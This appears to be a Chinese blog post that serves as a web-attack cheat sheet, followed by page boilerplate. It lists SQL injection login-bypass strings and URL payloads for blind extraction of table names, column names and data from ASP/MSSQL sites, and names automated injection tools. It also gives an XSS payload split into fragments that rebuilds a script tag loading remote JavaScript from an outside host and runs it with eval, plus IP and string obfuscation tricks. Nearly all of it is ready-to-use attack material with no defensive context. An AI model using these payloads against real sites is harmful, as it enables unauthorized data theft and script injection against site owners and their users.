' or 1=1--
" or 1=1--
or 1=1--
' or 'a'='a
" or "a"="a
') or ('a'='a
") or ("a"="a
在ASP下的工具有NBSI,啊D,明小子的Domain
在PHP下有工具有PHP-Mysql注射分析器,CASI,HDSI
猜解表名:
http://www.xxx.com/xx.asp?id=x and exists(select * from 表名)
猜解列名:
http://www.xxx.com/xx.asp?id=x and exists(select 列名 from 表名)
猜解列的长度:
http://www.xxx.com/xx.asp?id=x and (select top 1 len(列名) from 表名)>1、>2、>3。。。
猜解列:
http://www.xxx.com/xx.asp?id=x and (select top 1 asc(mid(adminname,1,1)) from config)>50
MSSQL:
http://www.xxx.com/xxx.asp?id=x and user>0就可以得到当前用户的用户名了
xss突破长度限制:
<script>z='document.'</script>
<script>z=z+'write("'</script>
<script>z=z+'<script'</script>
<script>z=z+' src=ht'</script>
<script>z=z+'tp://ww'</script>
<script>z=z+'w.shell'</script>
<script>z=z+'.net/1.'</script>
<script>z=z+'js></sc'</script>
<script>z=z+'ript>")'</script>
<script>eval(z)</script>
像127.0.0.1这样的ip还可以变作2130706443、0x7f.0x00.0x00.0x01、0177.0000.0000.0001等。
$_GET $_POST $_REQUEST
select * from members where username=char(97,100,109,105,110);
select * from members where username=0x616463696e
ASP、PHP等脚本语言都是属于解释性语言,而JSP是属于编译性语言。
null
發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章
1-Wire单总线协议
越过山丘呀
2020-06-25 09:18:49
浅谈TEDS智能传感器
越过山丘呀
2020-06-23 21:32:47
TEDS电子表单技术的基本介绍
越过山丘呀
2020-06-22 17:05:18
web蠕虫
Neal__caffreal
2020-06-22 11:10:16
Win Server 2003远程桌面提示:要登录到这台远程计算机,您必须拥有这台计算机上的终端服务器用户访问权限提示的解决办法
o_0123
2020-02-21 04:02:57
Paxos获SEC无行动异议函!
baidu_39383304
2020-02-21 01:46:25
基于ngx_lua_waf模块配置web应用防火墙
linuxsec點cn
2018-09-12 07:06:54
Zabbix 监控windows服务器监控闪断zabbix_get [12577]: Timeout while executing operatio
澤日月
2018-09-11 04:28:42
bak 安全牛 kali link
herhuel3200
2018-09-03 23:40:40